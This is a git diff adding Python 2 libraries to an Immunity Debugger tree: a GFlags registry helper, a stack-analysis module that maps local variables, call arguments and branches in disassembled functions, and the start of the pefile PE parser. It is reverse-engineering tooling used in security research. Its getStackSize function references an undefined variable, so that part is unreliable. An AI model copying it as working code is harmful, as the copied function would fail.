+ except WindowsError:
+ raise Exception, "Cannot SetValue key (%s\\%s)" % ( self.subkey, "GlobalFlag")
+ except ValueError:
+ raise Exception, "Cannot SetValue key (%s\\%s) %s %s" % ( self.subkey, "GlobalFlag", str(flag), type(flag))
+
+ try:
+ _winreg.CloseKey(hkey)
+ except WindowsError:
+ raise Exception, "Cannot Close key (%s)" % self.subkey
+
+if __name__ == "__main__":
+ g = GFlags("notepad.exe")
+ g.Set( 'htc' )
+ g.Clear()
+
\ No newline at end of file
diff --git a/1.73/Libs/libstackanalyze.py b/1.73/Libs/libstackanalyze.py
new file mode 100755
index 0000000..6cc63bf
--- /dev/null
+++ b/1.73/Libs/libstackanalyze.py
@@ -0,0 +1,688 @@
+#!/usr/bin/env python
+"""
+Immunity Debugger Stack Analysis Lib
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Stack Analysis Lib
+
+"""
+
+__VERSION__ = "1.1"
+
+from libanalyze import *
+from libdatatype import *
+
+class StackFunction(Function):
+ """
+ This is an inherited class from Function that add stack analysis capabilities.
+
+ The params are the same as the Function class.
+ """
+
+ def analyzeStack(self, base = None):
+ """
+ Analyze the stack of a function, searching frame-based local variables.
+
+ @type base: StackFunction OBJECT | None
+ @param base: represent the object where we want to do the searchHits (for cache reasons), it can be "self".
+
+ @rtype: LIST
+ @return: in order:
+ - calls: (dictionary) key: caller addy, value: (list) callee addy and args
+ - myVarHits: (dictionary) key: stack constant, value: (list) hits addresses
+ - myArgHits: (dictionary) key: stack constant, value: (list) hits addresses
+ - varsSize:(dictionary) key: stack constant, value: size of the variable
+ """
+
+ if not base:
+ base = self
+
+ if not self.imm.isAnalysed( self.getStart() ):
+ self.imm.analyseCode( self.getStart() )
+
+ #Search the function start using an alternative method or normal method or
+ #use the given address
+ start = self.getFunctionBegin(self.getStart())
+ if not start:
+ start = self.imm.getFunctionBegin(self.getStart())
+ if start:
+ self.setStart(start)
+
+ self.calls = {}
+ for bb in self.getBasicBlocks(force = True):
+ for addy,dest in self.searchCalls(bb):
+ args = self.searchArgs(addy, bb)
+ self.calls[addy] = [dest, args]
+
+ #we make the searchHits all in the same object, to cache the results
+ self.argHits = {}
+ self.varHits = {}
+
+ myVarHits, myArgHits = base.searchHits(self.getStart())
+
+ self.getVarsSize(myVarHits.keys())
+
+ return ( self.calls, myVarHits, myArgHits, self.varsSize )
+
+ def searchCalls(self, bb):
+ """
+ Search all the calls inside a BB and find the real dest address
+
+ @type bb: BasicBlock OBJECT
+ @param bb: BasicBlock to search into
+
+ @rtype: LIST
+ @return: A list of tuples of the form: from_address, to_address
+ """
+ ret = []
+ for op in bb.getInstructions(self.imm):
+ if op.isCall() or (op.isJmp() and not op.getIndexed() and op.getAddrConst() and op.getOpData()[0]):
+ #CALL CONST, CALL DWORD PTR DS:[CONST], JMP DWORD PTR DS:[CONST]
+ dest = self.hopJump(op.getAddress(), includecall=True)
+ if dest:
+ #hop JMP tables
+ tmp = self.hopJump(dest)
+ if tmp:
+ dest = tmp
+ ret.append( (op.getAddress(), dest) )
+ return ret
+
+ def searchArgs(self, addy, bb):
+ """
+ Search possible arguments inside the function, following the PUSHes before a call
+
+ @type addy: DWORD
+ @param addy: Start address to begin searching backward for arguments
+
+ @type bb: BasicBlock OBJECT
+ @param bb: Find arguments just inside this BB
+
+ @rtype: DICTIONARY
+ @return: the key is the argument number and the value is another dictionary:
+ { 'type' : const|lvar|gvar|arg|call|other,
+ 'ref' : TRUE|FALSE (is a reference or not),
+ 'value': DWORD,
+ 'addy' : DWORD }
+ """
+ op = self.imm.disasm(addy)
+ args = {}
+ argc = 1
+
+ while True:
+ op = self.imm.disasmBackward(op.getAddress(),1)
+
+ #search only inside the BB and stop on any call
+ if op.getAddress() < self.getBBStart(addy) or op.isCall():
+ break
+
+ asm = op.getDisasm()
+ if "PUSH " in asm:
+ if op.operand[0][0] == DEC_CONST:
+ #PUSH CONST
+ args[argc] = { 'type':'const',
+ 'ref':False,
+ 'value':op.getImmConst(),
+ 'addy' :op.getAddress() }
+ argc += 1
+ elif " PTR " in asm:
+ #PUSH a direct arg/local var/global var
+ const = asm.split("[")[1][:-1]
+ try:
+ if "EBP" in const:
+ if "-" in const:
+ type="lvar"
+ try:
+ const = int(const.split('-')[1], 16)
+ except:
+ argc += 1
+ continue
+ elif "+" in const:
+ type="arg"
+ try:
+ const = int(const.split('+')[1], 16)
+ except:
+ argc += 1
+ continue
+ elif not op.getIndexed() and op.getAddrConst():
+ type = "gvar"
+ const = int(const, 16)
+ else:
+ argc += 1
+ continue
+
+ args[argc] = { 'type' :type,
+ 'ref' :False,
+ 'value':const,
+ 'addy' :op.getAddress() }
+ argc += 1
+ except:
+ self.imm.Log("error possible var: %08X -> %s" % (op.getAddress(), asm))
+ else:
+ #PUSH REG
+ reg = asm.split(" ")[1]
+ #get the opCode where the reg it's set to his actual value
+ regop = self.followRegBack(op.getAddress(), reg)
+ if regop == None:
+ argc += 1
+ continue
+ regasm = regop.getDisasm()
+ #by default is "other"
+ type = "other"
+ const = regop.getAddress()
+ #stack fun
+ if "[EBP-" in regasm:
+ type="lvar"
+ try:
+ const = int(regasm.split('-')[1][:-1], 16)
+ except:
+ argc += 1
+ continue
+ elif "[EBP+" in regasm:
+ type="arg"
+ try:
+ const = int(regasm.split('+')[1][:-1], 16)
+ except:
+ argc += 1
+ continue
+ #is this a pointer?
+ if "MOV" in regasm:
+ pRef = True
+ else:
+ pRef = False
+ #the value comes from the return of another call (save the address of the call)
+ if regop.isCall():
+ type="call"
+ const=regop.getAddress()
+ pRef=False
+
+ args[argc] = { 'type' :type,
+ 'ref' :pRef,
+ 'value':const,
+ 'addy' :op.getAddress() }
+ argc += 1
+ return args
+
+ def getBBStart(self, addy):
+ """
+ Get the begining of a BB using a given address
+
+ @type addy: DWORD
+ @param addy: Address of reference to find the BB start
+
+ @rtype: DWORD | None
+ @return: Address of the Basic Block's begining
+ """
+ for bb in self.getBasicBlocks():
+ limits = bb.getLimits()
+ if addy >= limits[0] and addy <= limits[1]:
+ return limits[0]
+ return None
+
+ def hopJump(self, address, includecall=False):
+ """
+ Hop to the real destination address from a FAR CALL or may be a JMP Table
+
+ @type address: DWORD
+ @param address: Address of JMP/CALL
+
+ @type address: Boolean
+ @param address: Accept a Call instruction as a possible hop
+
+ @rtype: DWORD
+ @return: Address of the decoded jump/call or the given address if it can't be decoded
+ """
+ op = self.imm.disasm(address)
+ dest = None
+
+ if (includecall and op.isCall()) or op.isJmp() or op.isConditionalJmp():
+ if op.getJmpConst():
+ dest = op.getJmpConst()
+ elif not op.getIndexed() and op.getAddrConst() and op.getOpData()[0]:
+ #Check that isn't indexed ([REG32+xxx])
+ #Check that have an address constant ([CONST])
+ #Check that address goes to somewhere inside the code
+ dest = op.getOpData()[0]
+ return dest
+
+ def followRegBack(self, followAddress, reg):
+ """
+ Follow back a reg inside a BB until we get a MOV/LEA REG
+
+ @type followAddress: DWORD
+ @param followAddress: Start address to begin searching backward
+
+ @type reg: STRING
+ @param reg: Register to follow
+
+ @rtype: opCode OBJECT | None
+ @return: the opcode instance where the reg is defined
+ """
+
+ op = self.imm.disasmBackward(followAddress,1)
+ while op.getAddress() >= self.getBBStart(followAddress):
+ #self.imm.Log("followRegBack addy: %08X - asm: %s" % \
+ #(op.getAddress(), op.getDisasm()))
+
+ #check if we found a winner
+ if "MOV %s," % reg in op.getDisasm() or "LEA %s," % reg in op.getDisasm():
+ return op
+
+ #if it's a REG32, look for the REG16 version too
+ if "E" in reg:
+ if "MOV %s," % reg.strip("E") in op.getDisasm() or "LEA %s," % reg.strip("E") in op.getDisasm():
+ return op
+
+ #if We found a call before a MOV and the reg is EAX/AX, it could be the return of another function
+ if op.isCall() and reg.strip("E") == "AX":
+ return op
+
+ op = self.imm.disasmBackward(op.getAddress(), 1)
+
+ return None
+
+ def isInsideFunction(self, address):
+ """
+ Check if an address is inside the function limits.
+
+ @type address: DWORD
+ @param address: Address to check
+
+ @rtype: Boolean
+ @return: return if is inside or not
+ """
+
+ for bb in self.getBasicBlocks():
+ limits = bb.getLimits()
+ if address >= limits[0] and address <= limits[1]:
+ return True
+ return False
+
+ def getStackSize(self):
+ """
+ Read the CONST on the function init sequence to get the stack size.
+
+ @rtype: INTEGER | None
+ @return: The constant from the function's prolog, normally associated
+ to the total size of the local variables.
+ """
+
+ if "SUB ESP," in self.imm.disasmForward(self.getStart(), 2).getDisasm():
+ return size_op.getImmConst()
+ if "SUB ESP," in self.imm.disasmForward(self.getStart(), 3).getDisasm():
+ return size_op.getImmConst()
+ if "SUB ESP," in self.imm.disasmForward(self.getStart(), 4).getDisasm():
+ return size_op.getImmConst()
+
+ return None
+
+ def searchHits(self, address):
+ """
+ Look for instructions that use args or local vars.
+
+ @type address: DWORD
+ @param address: Function start
+
+ @rtype: TUPLE
+ @return: A 2-tuple of dictionaries, one with the vars and one with the args for this function.
+ Each dictionary use the stack constant as key and a list of hit addresses as value.
+ """
+
+ mod = self.imm.getModulebyAddress(address)
+ base = mod.getBaseAddress()
+
+ if not base:
+ return ( {}, {} )
+
+ #we do this just one time for all the execution and save only the part we need, cleaning the rest
+ if not self.argHits.has_key(base) and not self.varHits.has_key(base):
+ for asm in ("LEA R32,[EBP-CONST]", "MOV R32,[EBP-CONST]", "LEA R16,[EBP-CONST]", "MOV R16,[EBP-CONST]", "LEA R8,[EBP-CONST]", \
+ "MOV R8,[EBP-CONST]", "PUSH DWORD PTR SS:[EBP-CONST]", "LEA R32,[EBP+CONST]", "MOV R32,[EBP+CONST]", \
+ "PUSH DWORD PTR SS:[EBP+CONST]"):
+ hits = self.imm.searchCommandsOnModule(address, asm)
+ self.__saveHits(hits, base)
+ del hits
+
+ #here we select only the function specific hits
+ myVars = {}
+ for hit in self.varHits[base]:
+ #use only the hits inside the function
+ if self.isInsideFunction(hit):
+ const = self.varHits[base][hit]
+ if not myVars.has_key(const):
+ myVars[const] = []
+ myVars[const].append(hit)
+
+ myArgs = {}
+ for hit in self.argHits[base]:
+ #use only the hits inside the function
+ if self.isInsideFunction(hit):
+ const = self.argHits[base][hit]
+ if not myArgs.has_key(const):
+ myArgs[const] = []
+ myArgs[const].append(hit)
+
+ return ( myVars, myArgs )
+
+ def __saveHits(self, hits, base):
+ """
+ save the hits separating args from vars and using the address as key (inside a dictionary by module).
+ """
+ if not self.varHits.has_key(base):
+ self.varHits[base] = {}
+ if not self.argHits.has_key(base):
+ self.argHits[base] = {}
+
+ for hit in hits:
+ op = self.imm.disasm(hit[0])
+ asm = op.getDisasm()
+ if '-' in asm:
+ #local var
+ const = int(asm.split('-')[1][:-1], 16)
+ self.varHits[base][hit[0]] = const
+ elif '+' in asm:
+ #argument
+ const = int(asm.split('+')[1][:-1], 16)
+ self.argHits[base][hit[0]] = const
+ del asm
+ del op
+
+ def getVarsSize(self, offsets):
+ """
+ Get the size of the local vars, checking the difference between the offset
+ of two consecutives vars.
+
+ XXX:An unused local var can make this check unreliable.
+
+ @type offsets: LIST
+ @param offsets: a list of stack's constants
+
+ @rtype: DICTIONARY
+ @return: the key is the stack's constant, value is the size
+ """
+
+ self.varsSize = {}
+ offsets.sort()
+ last = 0
+ for off in offsets:
+ size = off - last
+ last = off
+ self.varsSize[off] = size
+ return self.varsSize
+
+ def getFunctionBranches(self):
+ """
+ Make an acyclic tree of all possible execution branches
+
+ @rtype: LIST
+ @return: a list with one or more lists of Basic Block's addresses.
+ """
+
+ tree = {}
+ for bb in self.getBasicBlocks():
+ tree[bb.getStart()] = bb.getEdges()
+ branches = FunctionBranches(tree, self.getStart())
+ self.Branches = branches.getBranches()
+ return self.Branches
+
+ def getFunctionBegin(self, beginAddress, maxsteps = 500):
+ """
+ Walk back the code until we get a PUSH EBP/MOV EBP,ESP/SUB ESP, CONST
+ XXX: there're better ways to do this (BB-like)
+
+ @type beginAddress: DWORD
+ @param beginAddress: an address of reference to start the searching
+
+ @type maxsteps: INTEGER
+ @param maxsteps: max steps to search backward
+
+ @rtype: DWORD | None
+ @return: Function Begin's address or None if we are outside the scope of
+ search
+ """
+
+ #we can position ourself some steps forward, before start searching backward
+ #to avoid be in the middle of a "MOV EDI,EDI/PUSH EBP/MOV EBP,ESP/SUB ESP, CONST"
+ instr = 0
+ while instr < 10:
+ op = self.imm.disasmForward(beginAddress, instr)
+ instr += 1
+
+ #Stop if something is going to change the course of action
+ if op.isCall() or op.isJmp() or op.isConditionalJmp() or op.isRet():
+ break
+ address = op.getAddress()
+
+ instr = 1
+ ret = None
+ while instr < maxsteps:
+ op = self.imm.disasmBackward(address, 1)
+
+ if "PUSH EBP" in op.getDisasm():
+ #check a second instr of a stack initialization (could have some instr in the middle)
+ if "MOV EBP,ESP" in self.imm.disasmForward(address, 0).getDisasm() or \
+ "MOV EBP,ESP" in self.imm.disasmForward(address, 1).getDisasm() or \
+ "MOV EBP,ESP" in self.imm.disasmForward(address, 2).getDisasm():
+ ret = op.getAddress()
+ break
+
+ address = op.getAddress()
+ instr += 1
+
+ if ret:
+ #check if there is a MOV before the start, if so, use that address
+ if "MOV " in self.imm.disasmBackward(ret, 1).getDisasm():
+ ret = self.imm.disasmBackward(ret, 1).getAddress()
+ return ret
+
+ def getCalls(self):
+ return self.calls
+ def getvarHits(self):
+ return self.varHits
+ def getargHits(self):
+ return self.argHits
+ def getvarsSize(self):
+ return self.varsSize
+ def getBranches(self):
+ return self.Branches
+
+class FunctionBranches:
+ """
+ Traverse a tree to get all possible branches (execution flows)
+ The class don't follow cycles.
+ """
+
+ def __init__(self, tree, startnode):
+ """
+ @type tree: DICTIONARY
+ @param tree: a dictionary of BBs the key is the BB Start and the value is a
+ list of out-edges.
+
+ @type startnode: DWORD
+ @param startnode: The base node where the tree begin
+ """
+ self.branches = []
+ self.tree = tree
+ self.start = startnode
+ self.TraverseTree(self.start, [self.start])
+
+ def getBranches(self):
+ """
+ Get the function branches processed by the TraverseTree function.
+
+ @rtype: LIST
+ @return: a list of branches, each one is a list of Basic Block start address
+ """
+ return self.branches
+
+ def TraverseTree(self, node, branch):
+ if not self.tree.has_key(node):
+ return None
+
+ if self.tree[node][0] == 0 and self.tree[node][1] == 0:
+ #End Node
+ self.branches.append(branch)
+
+ if self.tree[node][0] != 0:
+ #True Edge
+ if self.tree[node][0] in branch:
+ #Loop found
+ self.branches.append(branch)
+ else:
+ tmp = branch[:]
+ tmp.append(self.tree[node][0])
+ self.TraverseTree(self.tree[node][0],tmp)
+
+ if self.tree[node][1] != 0:
+ #False Edge
+ if self.tree[node][1] in branch:
+ #Loop found
+ self.branches.append(branch)
+ else:
+ tmp = branch[:]
+ tmp.append(self.tree[node][1])
+ self.TraverseTree(self.tree[node][1],tmp)
+
+class FlowAnalyzer:
+ def __init__(self, imm, address, steps=1, __base=None):
+ """
+ Try to figure out the relation of local variables and arguments between
+ different functions.
+
+ @type imm: Debugger OBJECT
+ @param imm: a debugger object to interact with the debugger
+
+ @type address: DWORD
+ @param address: a reference address to start the function analysis
+
+ @type steps: INTEGER
+ @param steps: How many steps (functions) forward it has to analyze
+
+ @type __base: StackFunction OBJECT | None
+ @param __base: instance used to make all the searchCommands calls, used internally
+ """
+
+ self.imm = imm
+ self.address = address
+ self.steps = steps
+ self.calls = {}
+ self.varHits = {}
+ self.argHits = {}
+ self.varsSize = {}
+
+ self.function = StackFunction(self.imm, self.address)
+
+ #setup the base Function at the first execution
+ if "base" not in dir(self):
+ if __base:
+ self.base = __base
+ else:
+ self.base = self.function
+
+ ret = self.function.analyzeStack(self.base)
+
+ self.functionBegin = self.function.getStart()
+ self.calls[self.functionBegin] = ret[0]
+ self.varHits[self.functionBegin] = ret[1]
+ self.argHits[self.functionBegin] = ret[2]
+ self.varsSize[self.functionBegin] = ret[3]
+
+ if self.steps > 0:
+ self.analyzeFunction()
+
+ def analyzeFunction(self):
+ """
+ Analyze the function's calls to collect information
+ """
+
+ for addy,data in self.function.getCalls().iteritems():
+ flow = FlowAnalyzer(self.imm, data[0], self.steps-1, self.base)
+
+ calls, vars, args, varsize = flow.getFlowInformation()
+ for functstart,_calls in calls.iteritems():
+ if not self.calls.has_key(functstart):
+ self.calls[functstart] = _calls
+ for functstart,_vars in vars.iteritems():
+ if not self.varHits.has_key(functstart):
+ self.varHits[functstart] = _vars
+ for functstart,_args in args.iteritems():
+ if not self.argHits.has_key(functstart):
+ self.argHits[functstart] = _args
+ for functstart,_varsize in varsize.iteritems():
+ if not self.varsSize.has_key(functstart):
+ self.varsSize[functstart] = _varsize
+
+ def getFlowInformation(self):
+ """
+ Returns all the information collected, the format of each variable is the same
+ of the StackFunction, but allocated inside a dictionary where the key is
+ the Funcion Start.
+ """
+ return [ self.calls, self.varHits, self.argHits, self.varsSize ]
+
+ def getFunctionBegin(self):
+ return self.functionBegin
+
+ def decodeConstant(self, addy, size=4096):
+ """
+ decode a constant value trying to find a string.
+
+ @type addy: DWORD
+ @param addy: Address to decode
+
+ @type size: INTEGER
+ @param size: Max size of the memory chunk that it decode, default=4096
+
+ @rtype: LIST | None
+ @return: a list with the string value decoded and length of it
+ """
+
+ if self.imm.getMemoryPagebyAddress(addy) != None:
+ datatype = DataTypes(self.imm)
+ posstype = datatype.Discover(self.imm.readMemory(addy, size), addy, what='strings')
+ if posstype:
+ return [ posstype[0].Print()[1:-1], len(posstype[0].Print()[1:-1]) ]
+ return None
+
+ def argInfo(self,function,callfrom,argc):
+ """
+ Show argument information in a more suitable way
+
+ @type function: DWORD
+ @param function: Address of the function begin
+
+ @type callfrom: DWORD
+ @param callfrom: Address of the call related to the arguments we need to decode
+
+ @type argc: INTEGER
+ @param argc: argument count of the arg we want to decode
+
+ @rtype: STRING
+ @return: a string with useful information about the argument
+ """
+
+ try:
+ info = self.calls[function][callfrom][1][argc]
+ except KeyError:
+ self.imm.Log("can't decode arg info for function %08X - call: %08X - argc: %d" % \
+ (function,callfrom,argc))
+ return ""
+
+ value = "%08X" % info['value']
+ tmp = ""
+ if info['type'] == "const":
+ const = self.decodeConstant(info['value'])
+ if const:
+ value = "%s - size: %d" % (const[0][:30], const[1])
+ elif info['type'] == "arg":
+ value = "%s->arg[%d]" % ( self.imm.decodeAddress(function), (info['value']-4)/4 )
+ elif info['type'] == "lvar":
+ try:
+ size = self.varsSize[function][info['value']]
+ tmp += " size: %X" % size
+ except:
+ pass
+ if info['ref']: tmp += " [REF]"
+
+ return "arg[%d] (%5s) value: %s%s" % (argc, info['type'], value, tmp)
diff --git a/1.73/Libs/pefile.py b/1.73/Libs/pefile.py
new file mode 100755
index 0000000..ab5f495
--- /dev/null
+++ b/1.73/Libs/pefile.py
@@ -0,0 +1,4467 @@
+# -*- coding: Latin-1 -*-
+"""pefile, Portable Executable reader module
+
+
+All the PE file basic structures are available with their default names
+as attributes of the instance returned.
+
+Processed elements such as the import table are made available with lowercase
+names, to differentiate them from the upper case basic structure names.
+
+pefile has been tested against the limits of valid PE headers, that is, malware.
+Lots of packed malware attempt to abuse the format way beyond its standard use.
+To the best of my knowledge most of the abuses are handled gracefully.
+
+Copyright (c) 2005, 2006, 2007 Ero Carrera
+
+All rights reserved.
+
+For detailed copyright information see the file COPYING in
+the root of the distribution archive.
+"""
+
+__author__ = 'Ero Carrera'
+__version__ = '1.2.8'
+__contact__ = 'ero@dkbza.org'
+
+import os
+import struct
+import time
+import math
+import re
+import exceptions
+import string
+import array
+
+fast_load = False
+
+IMAGE_DOS_SIGNATURE = 0x5A4D
+IMAGE_OS2_SIGNATURE = 0x454E
+IMAGE_OS2_SIGNATURE_LE = 0x454C
+IMAGE_VXD_SIGNATURE = 0x454C
+IMAGE_NT_SIGNATURE = 0x00004550
+ARCHIVE_SIGNATURE = "!\n"
+IMAGE_NUMBEROF_DIRECTORY_ENTRIES= 16
+IMAGE_ORDINAL_FLAG = 0x80000000L
+IMAGE_ORDINAL_FLAG64 = 0x8000000000000000L
+OPTIONAL_HEADER_MAGIC_PE = 0x10b
+OPTIONAL_HEADER_MAGIC_PE_PLUS = 0x20b
+IMAGE_SYM_UNDEFINED = 0x0
+IMAGE_SYM_ABSOLUTE = -0x1
+IMAGE_SYM_DEBUG = -0x2
+
+
+directory_entry_types = [
+ ('IMAGE_DIRECTORY_ENTRY_EXPORT', 0),
+ ('IMAGE_DIRECTORY_ENTRY_IMPORT', 1),
+ ('IMAGE_DIRECTORY_ENTRY_RESOURCE', 2),
+ ('IMAGE_DIRECTORY_ENTRY_EXCEPTION', 3),
+ ('IMAGE_DIRECTORY_ENTRY_SECURITY', 4),
+ ('IMAGE_DIRECTORY_ENTRY_BASERELOC', 5),
+ ('IMAGE_DIRECTORY_ENTRY_DEBUG', 6),
+ ('IMAGE_DIRECTORY_ENTRY_COPYRIGHT', 7),
+ ('IMAGE_DIRECTORY_ENTRY_GLOBALPTR', 8),
+ ('IMAGE_DIRECTORY_ENTRY_TLS', 9),
+ ('IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG', 10),
+ ('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', 11),
+ ('IMAGE_DIRECTORY_ENTRY_IAT', 12),
+ ('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', 13),
+ ('IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR',14),
+ ('IMAGE_DIRECTORY_ENTRY_RESERVED', 15) ]
+
+DIRECTORY_ENTRY = dict([(e[1], e[0]) for e in directory_entry_types]+directory_entry_types)
+
+image_characteristics = [
+ ('IMAGE_FILE_RELOCS_STRIPPED', 0x0001),
+ ('IMAGE_FILE_EXECUTABLE_IMAGE', 0x0002),
+ ('IMAGE_FILE_LINE_NUMS_STRIPPED', 0x0004),
+ ('IMAGE_FILE_LOCAL_SYMS_STRIPPED', 0x0008),
+ ('IMAGE_FILE_AGGRESIVE_WS_TRIM', 0x0010),
+ ('IMAGE_FILE_LARGE_ADDRESS_AWARE', 0x0020),
+ ('IMAGE_FILE_16BIT_MACHINE', 0x0040),
+ ('IMAGE_FILE_BYTES_REVERSED_LO', 0x0080),
+ ('IMAGE_FILE_32BIT_MACHINE', 0x0100),
+ ('IMAGE_FILE_DEBUG_STRIPPED', 0x0200),
+ ('IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP', 0x0400),
+ ('IMAGE_FILE_NET_RUN_FROM_SWAP', 0x0800),
+ ('IMAGE_FILE_SYSTEM', 0x1000),
+ ('IMAGE_FILE_DLL', 0x2000),
+ ('IMAGE_FILE_UP_SYSTEM_ONLY', 0x4000),
+ ('IMAGE_FILE_BYTES_REVERSED_HI', 0x8000) ]
+
+IMAGE_CHARACTERISTICS = dict([(e[1], e[0]) for e in
+ image_characteristics]+image_characteristics)
+
+image_symbol_types = [
+ ('IMAGE_SYM_TYPE_NULL', 0),
+ ('IMAGE_SYM_TYPE_VOID', 1),
+ ('IMAGE_SYM_TYPE_CHAR', 2),
+ ('IMAGE_SYM_TYPE_SHORT', 3),
+ ('IMAGE_SYM_TYPE_INT', 4),
+ ('IMAGE_SYM_TYPE_LONG', 5),
+ ('IMAGE_SYM_TYPE_FLOAT', 6),
+ ('IMAGE_SYM_TYPE_DOUBLE', 7),
+ ('IMAGE_SYM_TYPE_STRUCT', 8),
+ ('IMAGE_SYM_TYPE_UNION', 9),
+ ('IMAGE_SYM_TYPE_ENUM', 10),
+ ('IMAGE_SYM_TYPE_MOE', 11),
+ ('IMAGE_SYM_TYPE_BYTE', 12),
+ ('IMAGE_SYM_TYPE_WORD', 13),
+ ('IMAGE_SYM_TYPE_UINT', 14),
+ ('IMAGE_SYM_TYPE_DWORD', 15) ]
+
+IMAGE_SYMBOL_TYPES = dict([(e[1], e[0]) for e in
+ image_symbol_types]+image_symbol_types)
+
+image_symbol_dtypes = [
+ ('IMAGE_SYM_DTYPE_NULL', 0),
+ ('IMAGE_SYM_DTYPE_POINTER', 1),
+ ('IMAGE_SYM_DTYPE_FUNCTION', 2),
+ ('IMAGE_SYM_DTYPE_ARRAY', 3) ]
+
+IMAGE_SYMBOL_DTYPES = dict([(e[1], e[0]) for e in
+ image_symbol_dtypes]+image_symbol_dtypes)
+
+image_symbol_classes = [
+ ('IMAGE_SYM_CLASS_END_OF_FUNCTION', 0xFF),
+ ('IMAGE_SYM_CLASS_NULL', 0),
+ ('IMAGE_SYM_CLASS_AUTOMATIC', 1),
+ ('IMAGE_SYM_CLASS_EXTERNAL', 2),
+ ('IMAGE_SYM_CLASS_STATIC', 3),
+ ('IMAGE_SYM_CLASS_REGISTER', 4),
+ ('IMAGE_SYM_CLASS_EXTERNEL_DEF', 5),
+ ('IMAGE_SYM_CLASS_LABEL', 6),
+ ('IMAGE_SYM_CLASS_UNDEFINED_LABEL', 7),
+ ('IMAGE_SYM_CLASS_MEMBER_OF_STRUCT', 8),
+ ('IMAGE_SYM_CLASS_ARGUMENT', 9),
+ ('IMAGE_SYM_CLASS_STRUCT_TAG', 10),
+ ('IMAGE_SYM_CLASS_MEMBER_OF_UNION', 11),
+ ('IMAGE_SYM_CLASS_UNION_TAG', 12),
+ ('IMAGE_SYM_CLASS_TYPE_DEFINITION', 13),
+ ('IMAGE_SYM_CLASS_UNDEFINED_STATIC', 14),
+ ('IMAGE_SYM_CLASS_ENUM_TAG', 15),
+ ('IMAGE_SYM_CLASS_MEMBER_OF_ENUM', 16),
+ ('IMAGE_SYM_CLASS_REGISTER_PARAM', 17),
+ ('IMAGE_SYM_CLASS_BIT_FIELD', 18),
+ ('IMAGE_SYM_CLASS_BLOCK', 100),
+ ('IMAGE_SYM_CLASS_FUNCTION', 101),
+ ('IMAGE_SYM_CLASS_END_OF_STRUCT', 102),
+ ('IMAGE_SYM_CLASS_FILE', 103),
+ ('IMAGE_SYM_CLASS_SECTION', 104),
+ ('IMAGE_SYM_CLASS_WEAK_EXTERNAL', 105),
+ ('IMAGE_SYM_CLASS_CLR_TOKEN', 107) ]
+
+IMAGE_SYMBOL_CLASSES = dict([(e[1], e[0]) for e in
+ image_symbol_classes]+image_symbol_classes)
+
+section_characteristics = [
+ ('IMAGE_SCN_CNT_CODE', 0x00000020),
+ ('IMAGE_SCN_CNT_INITIALIZED_DATA', 0x00000040),
+ ('IMAGE_SCN_CNT_UNINITIALIZED_DATA', 0x00000080),
+ ('IMAGE_SCN_LNK_OTHER', 0x00000100),
+ ('IMAGE_SCN_LNK_INFO', 0x00000200),
+ ('IMAGE_SCN_LNK_REMOVE', 0x00000800),
+ ('IMAGE_SCN_LNK_COMDAT', 0x00001000),
+ ('IMAGE_SCN_MEM_FARDATA', 0x00008000),
+ ('IMAGE_SCN_MEM_PURGEABLE', 0x00020000),
+ ('IMAGE_SCN_MEM_16BIT', 0x00020000),
+ ('IMAGE_SCN_MEM_LOCKED', 0x00040000),
+ ('IMAGE_SCN_MEM_PRELOAD', 0x00080000),
+ ('IMAGE_SCN_ALIGN_1BYTES', 0x00100000),
+ ('IMAGE_SCN_ALIGN_2BYTES', 0x00200000),
+ ('IMAGE_SCN_ALIGN_4BYTES', 0x00300000),
+ ('IMAGE_SCN_ALIGN_8BYTES', 0x00400000),
+ ('IMAGE_SCN_ALIGN_16BYTES', 0x00500000),
+ ('IMAGE_SCN_ALIGN_32BYTES', 0x00600000),
+ ('IMAGE_SCN_ALIGN_64BYTES', 0x00700000),
+ ('IMAGE_SCN_ALIGN_128BYTES', 0x00800000),
+ ('IMAGE_SCN_ALIGN_256BYTES', 0x00900000),
+ ('IMAGE_SCN_ALIGN_512BYTES', 0x00A00000),
+ ('IMAGE_SCN_ALIGN_1024BYTES', 0x00B00000),
+ ('IMAGE_SCN_ALIGN_2048BYTES', 0x00C00000),
+ ('IMAGE_SCN_ALIGN_4096BYTES', 0x00D00000),
+ ('IMAGE_SCN_ALIGN_8192BYTES', 0x00E00000),
+ ('IMAGE_SCN_ALIGN_MASK', 0x00F00000),
+ ('IMAGE_SCN_LNK_NRELOC_OVFL', 0x01000000),
+ ('IMAGE_SCN_MEM_DISCARDABLE', 0x02000000),
+ ('IMAGE_SCN_MEM_NOT_CACHED', 0x04000000),
+ ('IMAGE_SCN_MEM_NOT_PAGED', 0x08000000),
+ ('IMAGE_SCN_MEM_SHARED', 0x10000000),
+ ('IMAGE_SCN_MEM_EXECUTE', 0x20000000),
+ ('IMAGE_SCN_MEM_READ', 0x40000000),
+ ('IMAGE_SCN_MEM_WRITE', 0x80000000L) ]
+
+SECTION_CHARACTERISTICS = dict([(e[1], e[0]) for e in
+ section_characteristics]+section_characteristics)
+
+debug_types = [
+ ('IMAGE_DEBUG_TYPE_UNKNOWN', 0),
+ ('IMAGE_DEBUG_TYPE_COFF', 1),
+ ('IMAGE_DEBUG_TYPE_CODEVIEW', 2),
+ ('IMAGE_DEBUG_TYPE_FPO', 3),
+ ('IMAGE_DEBUG_TYPE_MISC', 4),
+ ('IMAGE_DEBUG_TYPE_EXCEPTION', 5),
+ ('IMAGE_DEBUG_TYPE_FIXUP', 6),
+ ('IMAGE_DEBUG_TYPE_OMAP_TO_SRC', 7),
+ ('IMAGE_DEBUG_TYPE_OMAP_FROM_SRC', 8),
+ ('IMAGE_DEBUG_TYPE_BORLAND', 9),
+ ('IMAGE_DEBUG_TYPE_RESERVED10', 10) ]
+
+DEBUG_TYPE = dict([(e[1], e[0]) for e in debug_types]+debug_types)
+
+subsystem_types = [
+ ('IMAGE_SUBSYSTEM_UNKNOWN', 0),
+ ('IMAGE_SUBSYSTEM_NATIVE', 1),
+ ('IMAGE_SUBSYSTEM_WINDOWS_GUI', 2),
+ ('IMAGE_SUBSYSTEM_WINDOWS_CUI', 3),
+ ('IMAGE_SUBSYSTEM_OS2_CUI', 5),
+ ('IMAGE_SUBSYSTEM_POSIX_CUI', 7),
